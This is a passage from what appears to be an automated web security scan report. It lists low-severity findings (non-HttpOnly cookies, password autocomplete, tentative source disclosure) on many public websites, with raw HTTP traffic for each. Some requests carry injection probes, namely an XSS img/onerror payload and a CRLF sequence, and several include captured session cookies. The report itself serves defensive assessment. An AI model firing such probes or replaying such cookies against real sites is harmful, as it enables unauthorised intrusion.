Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=7AB67184950F0D9F75D5F23E7FC3DFB1.web118; Path=/; HttpOnly
X-ServedBy: web118
Pragma: cache
Cache-Control: private,max-age=86400
Last-Modified: Wed, 16 Jun 2010 10:59:28 GMT
Content-Type: image/gif;charset=UTF-8
Content-Length: 14896
Date: Sat, 23 Jul 2011 14:52:43 GMT
Server: SSWS
Set-Cookie: WebPersCookie=3hccqxzi6sLT5Se88w7usH+6wdXqHnz2M7Kh3ONjUGlD50TnK7NyX21bycI20Xe+69aOACy3n/WuS7E=; path=/

GIF89a.......957.............................................................................................t.......................[YZ........................|z{ .....LIJ...mjktrs...................
...[SNIP]...

11.236. http://www.uscg.mil/global/img/primary_uscg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uscg.mil
Path:	/global/img/primary_uscg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS655bb7=1cc2846ef85c8b0fb319d16612a8d3d5e8781ec08d8067414e29eb5a; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/img/primary_uscg.jpg HTTP/1.1
Host: www.uscg.mil
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/

Response

HTTP/1.1 200 OK
Content-Length: 43657
Content-Type: image/jpeg
Last-Modified: Mon, 27 Nov 2006 22:54:32 GMT
Accept-Ranges: bytes
ETag: "6afec407712c71:42c8"
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 21:27:53 GMT
Set-Cookie: TS655bb7=1cc2846ef85c8b0fb319d16612a8d3d5e8781ec08d8067414e29eb5a; Path=/

......JFIF.....H.H....-Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Windows.2006:11:27 17:54:29.........
...[SNIP]...

11.237. http://www.walmartlabs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmartlabs.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wt1.xbmnbsumbct.dpn=ffffffff0904176b45525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:25:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.walmartlabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:00 GMT
Server: Apache/2.2.15 (Fedora)
X-Pingback: http://www.walmartlabs.com/xmlrpc.php
Cteonnt-Length: 7514
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_wt1.xbmnbsumbct.dpn=ffffffff0904176b45525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:25:00 GMT;path=/
Cache-Control: private
Content-Length: 7514

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>@WalmartLabs</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" me
...[SNIP]...

11.238. http://www.wtp101.com/pull_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=58d1d589-451b-4796-8696-57c9a840b1c6; path=/; expires=Mon, 22 Jul 2013 04:48:34 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12. Password field with autocomplete enabled previous next
There are 8 instances of this issue:

https://acn-members.apple.com/mo_login/login.lasso
http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
http://forums.vostu.com/
http://forums.vostu.com/forums/41-Como-Jogar
http://static.curse.com/themes/common/v6/scripts/core.js
https://towernet.capitalonebank.com/loginpage.html
http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/
https://www.google.com/accounts/ServiceLogin

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. https://acn-members.apple.com/mo_login/login.lasso previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://acn-members.apple.com
Path:	/mo_login/login.lasso

Issue detail

The page contains a form with the following action URL:

https://acn-members.apple.com/mo_login/action.lasso

The form contains the following password field with autocomplete enabled:

password

Request

GET /mo_login/login.lasso HTTP/1.1
Host: acn-members.apple.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.0 200 OK
Server: Lasso/8
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
Content-Length: 6471

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Apple Consultants Network</title>
<meta name="Category" cont
...[SNIP]...
</P>

                                           <FORM ACTION="action.lasso" METHOD="post">
                                               <INPUT TYPE="HIDDEN" NAME="-response" VALUE="/members/enter_new.lasso">
...[SNIP]...
<BR><INPUT TYPE="password" NAME="password" VALUE="" SIZE="24">
                                                   </TD>
...[SNIP]...

12.2. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The page contains a form with the following action URL:

http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js?68769

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.3. http://forums.vostu.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://forums.vostu.com/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

Response

12.4. http://forums.vostu.com/forums/41-Como-Jogar previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/forums/41-Como-Jogar

Issue detail

The page contains a form with the following action URL:

http://forums.vostu.com/forums/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

Response

12.5. http://static.curse.com/themes/common/v6/scripts/core.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.curse.com
Path:	/themes/common/v6/scripts/core.js

Issue detail

The page contains a form with the following action URL:

http://static.curse.com/themes/common/v6/scripts/core.js?LastChanged=634456582020000000

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.6. https://towernet.capitalonebank.com/loginpage.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://towernet.capitalonebank.com
Path:	/loginpage.html

Issue detail

The page contains a form with the following action URL:

https://towernet.capitalonebank.com/cgi-bin/login.cgi

The form contains the following password fields with autocomplete enabled:

custpass
userpass

Request

GET /loginpage.html HTTP/1.1
Host: towernet.capitalonebank.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:40:59 GMT
Last-Modified: Thu, 09 Dec 2010 19:50:03 GMT
ETag: "39162-2e0f-8b3250c0"
Accept-Ranges: bytes
Content-Length: 11791
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<he
...[SNIP]...
</a>

<form action="/cgi-bin/login.cgi" method="post" name="login" id="login" class="towernet" onsubmit="return validateloginform()">
<input type="hidden" name="resetpw">
...[SNIP]...
</label>
<input id="custpass" name="custpass" type="password" size="9" maxlenght="9">
</div>
...[SNIP]...
</label>
<input id="userpass" name="userpass" type="password" size="9" maxlength="8">
</div>
...[SNIP]...

12.7. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.boston.com
Path:	/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The page contains a form with the following action URL:

http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.8. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:

https://www.google.com/accounts/ServiceLoginAuth

The form contains the following password field with autocomplete enabled:

Passwd

Request

GET /accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fhl%3Den%26tab%3Dwm%26ui%3Dhtml%26zy%3Dl&bsv=llya694le36z&scc=1&ltmpl=default&ltmplcache=2&hl=en&from=login HTTP/1.1
Host: www.google.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Jack+Henry+&+Associates
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GAPS=1:A9Y1_t9uyCkhfZk_SJunmhQNxf5SOg:iWDolYRdYX6lX5Tr; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=hF3sNFzNDiZMKMwt0WZVsaf-tISuy02NG32GFzcjWjmHZDjyHO4cH85LuW7T8eHtFsOa_-uBcVgFtj8eePDVp7JiXpDa_p72IxDR6LUJuVTSf2YVSO5Uj8_SPahG4RWl

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Set-Cookie: GAPS=1:8NHfoLp0YL1PxDKI4Z_HYTEUeiRmdA:nkPoqz6qT-62E4vt;Path=/accounts;Expires=Sat, 20-Jul-2013 19:04:38 GMT;Secure;HttpOnly
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=service%3Dmail%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fmail%252F%253Fhl%253Den%2526tab%253Dwm%2526ui%253Dhtml%2526zy%253Dl
Date: Thu, 21 Jul 2011 19:04:38 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 27775
Server: GSE

<html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="7+ GB of storage, less spam, and mobile access. Gmail is email
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>
<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"

class="gaia le val"

/>
</td>
...[SNIP]...

13. Source code disclosure previous next
There are 8 instances of this issue:

http://a.fsdn.com/con/js/min/sf.js
http://cache.boston.com/universal/js/underscore-min-1.1.6.js
http://cache.boston.com/universal/newsprojects/widgets/slider/slider.js
http://consultants-locator.apple.com/javascript/portal.1309219793.js
http://i1.social.s-msft.com/Search/scriptloader.js
http://secure.adnxs.com/seg
http://www.lifescript.com/JavaScript/Tracking/EfficientFrontier.js
http://www.microsoft.com/en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

13.1. http://a.fsdn.com/con/js/min/sf.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://a.fsdn.com
Path:	/con/js/min/sf.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /con/js/min/sf.js?1311259746 HTTP/1.1
Host: a.fsdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Jul 2011 13:48:15 GMT
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 335086
Cache-Control: public, max-age=1073283
Expires: Thu, 04 Aug 2011 14:50:18 GMT
Date: Sat, 23 Jul 2011 04:42:15 GMT
Connection: close

(function($){$.extend({metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o
...[SNIP]...
){var g=!/\W/.test(i)?c[i]=c[i]||b(document.getElementById(i).innerHTML):new Function("obj","var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('"+i.replace(/[\r\t\n]/g," ").split("<%").join("\t").replace(/((^|%>)[^\t]*)'/g,"$1\r").replace(/\t=(.*?)%>
...[SNIP]...
<div class="message <%=newClass%> <%=status%> <% if (sticky) { %><%=stickyClass %><% } %>" data-timer="<%=timer%>"><% if (title) { %><h6><%=title%></h6><% } %><div class="content"><%=message%></div>
...[SNIP]...

13.2. http://cache.boston.com/universal/js/underscore-min-1.1.6.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.boston.com
Path:	/universal/js/underscore-min-1.1.6.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /universal/js/underscore-min-1.1.6.js HTTP/1.1
Host: cache.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:04:34 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Content-Type: application/javascript
Warning: 110 cache.boston.com "Response is stale" "Tue, 12 Jul 2011 00:40:10 GMT"
Last-Modified: Fri, 27 May 2011 19:55:37 GMT
ETag: "1c33ca-26e8-4a4475250dc6a"
Accept-Ranges: bytes
Served-By: connor
Age: 2488
Cache-Control: max-age=3599
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Sat, 23 Jul 2011 14:04:32 GMT
Via: 1.1 rhv082178010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 9960

// Underscore.js 1.1.6
// (c) 2011 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed from Prototype,
/
...[SNIP]...
<a;e++)b.call(d,e)};b.mixin=function(a){h(b.functions(a),function(c){H(c,b[c]=a[c])})};var I=0;b.uniqueId=function(a){var b=I++;return a?a+b:b};b.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};b.template=function(a,c){var d=b.templateSettings;d="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+a.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(d.inte
...[SNIP]...

13.3. http://cache.boston.com/universal/newsprojects/widgets/slider/slider.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cache.boston.com
Path:	/universal/newsprojects/widgets/slider/slider.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /universal/newsprojects/widgets/slider/slider.js HTTP/1.1
Host: cache.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:04:16 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: application/javascript
Warning: 110 cache.boston.com "Response is stale" "Tue, 05 Jul 2011 11:01:38 GMT"
Last-Modified: Wed, 15 Jun 2011 14:33:09 GMT
ETag: "1f6f75-1dd7-4a5c1080a4961"
Accept-Ranges: bytes
Served-By: connor
Age: 2508
Cache-Control: max-age=3599
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Sat, 23 Jul 2011 14:04:16 GMT
Via: 1.1 rhv082185010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 7639

var SliderModel = Backbone.Model.extend({

   defaults: {
       index: 0,
       current: null,
       interval: 6000
   }

});

var SliderApp = Backbone.View.extend({

   options: {
       autoplay: true,
       resize_photos:
...[SNIP]...
<div class="slider-wrapper" style="width: <%= options.photo_width %>px; height: <%= options.height %>px; ">
...[SNIP]...
<div class="slider-photos" style="height: <%= options.photo_height %>px;"> <% _.each(collection, function(item) { %> <img class="slider-photo" src="<%= item.image_url %>" <% if (options.resize_photos) { %> width="<%= options.photo_width %>" <% } %>
...[SNIP]...
<div class="slider-navigation"> <% if (options.autoplay) { %> <div class="slider-timer-container">
...[SNIP]...
</div> <% _.each(collection, function(item, index) { %> <div class="slider-number" data-order="<%= index %>"><%= index + 1 %></div>
...[SNIP]...
<div class="slider-caption"><% if (image_caption) { %><%= image_caption %><% } %> <% if (image_credit) { %><span class="slider-credit"><%= image_credit %></span>
...[SNIP]...

13.4. http://consultants-locator.apple.com/javascript/portal.1309219793.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://consultants-locator.apple.com
Path:	/javascript/portal.1309219793.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /javascript/portal.1309219793.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 66986
Connection: close
Content-Type: text/html;charset=UTF-8

// portal.js
var loadedjs = false;
var preloadFlag = true;

function changeImages() {
if (loadedjs && preloadFlag)
{
for (var i=0; i<changeImages.arguments.length; i+=2)
{

...[SNIP]...
element.className = existingClassNames[cn];
}
}
}
return true;
}
return false;
}

/*
function hiliteMissingFields( formName, requiredFields)
{
fieldString = '<? if($layout['missing_fields']){ echo implode(",", $layout['missing_fields']); } ?>';
if(requiredFields && fieldString){
fieldString = fieldString+","+requiredFields;
} else {
fieldString = requiredFields;
}
var myRequiredFields = fieldString.split(",");;

...[SNIP]...

13.5. http://i1.social.s-msft.com/Search/scriptloader.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://i1.social.s-msft.com
Path:	/Search/scriptloader.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /Search/scriptloader.js?cver=1864.870%0d%0a HTTP/1.1
Host: i1.social.s-msft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/Search/en-US?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB41
Content-Length: 34611
Cache-Control: private, max-age=86400
Date: Sat, 23 Jul 2011 04:45:36 GMT
Connection: close
Vary: Accept-Encoding

/*
Note: Microsoft Corporation is not the original author of this script file. Microsoft obtained the original file from http://plugins.jquery.com/project/SimpleModal under the license that is refer
...[SNIP]...
return while case done elif esac eval fi function in local set then until ",
hashComments:true,cStyleComments:true,multiLineStrings:true,regexLiterals:true}),G={};u(la,["default-code"]);u(B([],[[z,/^[^<?]+/],["dec",/^<!\w[^>]*(?:>|$)/],[C,/^<\!--[\s\S]*?(?:-\->|$)/],["lang-",/^<\?([\s\S]+?)(?:\?>|$)/],["lang-",/^<%([\s\S]+?)(?:%>|$)/],[E,/^(?:<[%?]|[%?]>
...[SNIP]...

13.6. http://secure.adnxs.com/seg previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://secure.adnxs.com
Path:	/seg

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

Response

13.7. http://www.lifescript.com/JavaScript/Tracking/EfficientFrontier.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.lifescript.com
Path:	/JavaScript/Tracking/EfficientFrontier.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /JavaScript/Tracking/EfficientFrontier.js HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
